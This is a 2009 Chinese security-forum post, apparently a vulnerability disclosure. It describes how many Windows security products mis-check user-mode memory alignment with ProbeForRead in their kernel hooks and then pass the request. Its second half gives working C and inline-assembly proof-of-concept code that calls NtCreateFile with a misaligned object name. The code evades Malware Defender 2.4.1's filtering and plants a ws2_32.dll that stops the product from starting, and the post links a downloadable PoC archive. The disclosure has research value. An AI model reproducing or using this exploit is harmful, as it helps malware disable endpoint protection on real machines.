作 者: qihoocom
时 间: 2009-10-29,22:37
链 接: http://bbs.pediy.com/showthread.php?t=100321
本文介绍了一种方法,利用很多安全防御软件在进行用户态内存校验时的漏洞,对其保护系统进行攻击,达到绕过保护的目的。
这是安全防御软件对于用户态内存校验未能慎重处理而引发的恶果之一。去年10月我曾在对国内外绝大部分主动防御产品的系列漏洞文章中,揭示了同样由于对用户态内存校验不慎重,导致的一些本地内核模式拒绝访问漏洞的问题,这里我将介绍利用这类漏洞进行的攻击绕过方法,这个漏洞是我去年发现并在内部圈子做过一些讨论的,现在我将它公开出来。
本文会以Malware Defender最新版 2.4.1的实际存在的漏洞为例,来讲解这个攻击方法,但并不代表仅有这个安全软件存在漏洞,市面上大部分带防御驱动的安全产品都存在此漏洞。
很多安全防御软件在进行用户态内存的校验时,会使用 ProbeForRead函数,这个函数的源代码如下:
if (Length != 0) { if (((ULONG_PTR)Address & (Alignment - 1)) != 0) { ExRaiseDatatypeMisalignment(); } else if ((((ULONG_PTR)Address + Length) > (ULONG_PTR)MM_USER_PROBE_ADDRESS) || (((ULONG_PTR)Address + Length) < (ULONG_PTR)Address)) { *(volatile UCHAR * const)MM_USER_PROBE_ADDRESS = 0; } }
我们可以看到它实际做了这么两件事:
1.检查缓存长度不为0后,检查内存是否按指定的字节数对其
2.检查整个缓存区是否位于用户态内存范围内
这两个检查任意一个不成功,该函数都会引发一个异常,通常防御软件的驱动程序会在调用这个API的函数内设置try_except,并由其来捕获异常。通常在安全软件的HOOK过滤函数中,当捕获到这个异常,会直接放行这个操作
那么很容易想到,如果过滤函数中,未能正确设置要对齐的字节数,例如,过滤函数中,对某个缓存设置的对齐字节数为2,那么若缓存地址并未按2对齐,这时过滤驱动就会放行这个函数请求。但是如果Windows内核中,对这个缓存并不需要其按2对其进行检查,那么这个请求就会成功执行了。。
以Malware Defender为例,其核心驱动mdcore.sys(2.4.0.0 Final , CheckSum:4AE56 Timestamp:0x4AE7D795),对NtCreateFile的挂钩中有这样的处理
HookedNtCreateFile(....) { IncRefCnt(NT_CREATE_FILE_INDEX); ... //省略无关代码 __try { ProbeForRead(ObjectAttributes , sizeof(OBJECT_ATTRIBUTES) , 1); ProbeForRead(ObjectAttributes->ObjectName , sizeof(UNICODE_STRING) , sizeof(WORD)); ///省略无关代码 } __except(EXCEPTION_EXECUTE_HANDLER) { bPassRequest = TRUE ; } if (bPassRequest) { ///此处调用原始函数,放行操作 }
可以看到,MD对ObjectAttributes的ObjectName参数进行ProbeForRead时,使用了对齐字节数 2 , 但系统对这个参数的对齐是如何处理的呢?
实际上NtCreateFile对这个参数的处理位于:NtCreateFile->IoCreateFile->IopCreateFile->ObOpenObjectByName->ObpCaptureObjectCreateInformation->ObpCaptureObjectName中
关键代码如下:
try { if (ProbeMode != KernelMode) { ProbeAndReadUnicodeStringEx(&InputObjectName, ObjectName); ProbeForRead( InputObjectName.Buffer, InputObjectName.Length, sizeof(WCHAR) ); .....
ProbeAndReadUnicodeStringEx宏的实现:
#define ProbeAndReadUnicodeString(Source) / (((Source) >= (UNICODE_STRING * const)MM_USER_PROBE_ADDRESS) ? / (*(volatile UNICODE_STRING * const)MM_USER_PROBE_ADDRESS) : (*(volatile UNICODE_STRING *)(Source)))
可以看到,系统对这个参数压根没有进行任何字节对齐检查。
因此,我们可以构造一个特殊的NtCreateFile请求,并将ObjectName存放的缓存设置为不按2对齐的,就可以绕过MD的过滤,进行任何创建文件操作,例如,创建一个ws2_32.dll到md的目录下,导致其无法启动(正常MD保护打开时,是无法创建这个文件的)
示例代码如下:
WCHAR Filefname[MAX_PATH] = L"//??//c://program files//malware defender//ws2_32.dll//"; HMODULE hmod = GetModuleHandle("ntdll.dll"); PVOID pNtCreateFile = GetProcAddress(hmod , "NtCreateFile"); if (pNtCreateFile == 0) { printf("cannot get NtCreateFile/n"); getchar(); return 0 ; } HANDLE hFile ; ULONG FileAccess = DIRECTORY_ALL_ACCESS ; OBJECT_ATTRIBUTES oba ; IO_STATUS_BLOCK iosb ; ULONG FileAttr = FILE_ATTRIBUTE_NORMAL ; ULONG FileShare = FILE_SHARE_READ | FILE_SHARE_WRITE ; ULONG CreateDispos = FILE_CREATE ; ULONG CreateOptions = FILE_DIRECTORY_FILE; LONG stat ; UNICODE_STRING uniname ; uniname.Length = wcslen(Filefname) * sizeof(WCHAR); uniname.MaximumLength = MAX_PATH * sizeof(WCHAR); uniname.Buffer = Filefname ; PVOID pUniName = malloc(0x1000); while (((ULONG)pUniName & 1) == 0 ) { pUniName = (PVOID)((ULONG)pUniName + 1) ; } CopyMemory(pUniName , &uniname , sizeof(UNICODE_STRING)); InitializeObjectAttributes(&oba , (PUNICODE_STRING)pUniName , OBJ_CASE_INSENSITIVE , 0 , 0 ); __asm { push 0 push 0 push CreateOptions push CreateDispos push FileShare push FileAttr push 0 lea eax , iosb push eax lea eax ,oba push eax push FileAccess lea eax ,hFile push eax call pNtCreateFile mov stat , eax } if (stat != 0 ) { printf("cannot open file %ws %08x/n" , Filefname , stat); getchar(); return 0; } printf("create File OK!/n"); getchar(); return 0;
攻击结果:
测试程序下载:
附件 killmdfile.rar
或到http://mj0011.ys168.com 漏洞演示目录下killmdfile.rar下载